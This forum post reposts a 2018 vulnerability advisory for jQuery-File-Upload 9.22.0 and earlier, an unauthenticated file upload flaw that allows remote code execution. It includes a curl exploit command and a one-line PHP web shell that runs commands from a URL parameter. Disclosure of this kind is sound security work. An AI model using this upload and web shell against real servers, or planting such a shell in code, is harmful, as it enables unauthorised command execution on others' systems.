jQuery-File-Upload 9.22.0 Arbitrary File Upload

Topic created · 1 Posts · 1 Views
  • jQuery-File-Upload versions 9.22.0 and below suffer from an unauthenticated arbitrary file upload vulnerability that allows for remote command execution.
    MD5 | ea6808b39068792822a1f9dce775e157

    Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability  
    Author: Larry W. Cashdollar, @_larry0  
    Date: 2018-10-09  
    Download Site: https://github.com/blueimp/jQuery-File-Upload/releases  
    Vendor: https://github.com/blueimp  
    Vendor Notified: 2018-10-09  
    Advisory: http://www.vapidlabs.com/advisory.php?v=204  
    Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.  
    The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files  
    to the server.  It also doesn't exclude file types.  This allows for remote code execution.  
    Exploit Code:  
    $ curl   -F "[[email protected]](/cdn-cgi/l/email-protection)" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php  
    Where shell.php is:  
    <?php $cmd=$_GET['cmd']; system($cmd);?>  

    Source: packetstormsecurity.com

Log in to reply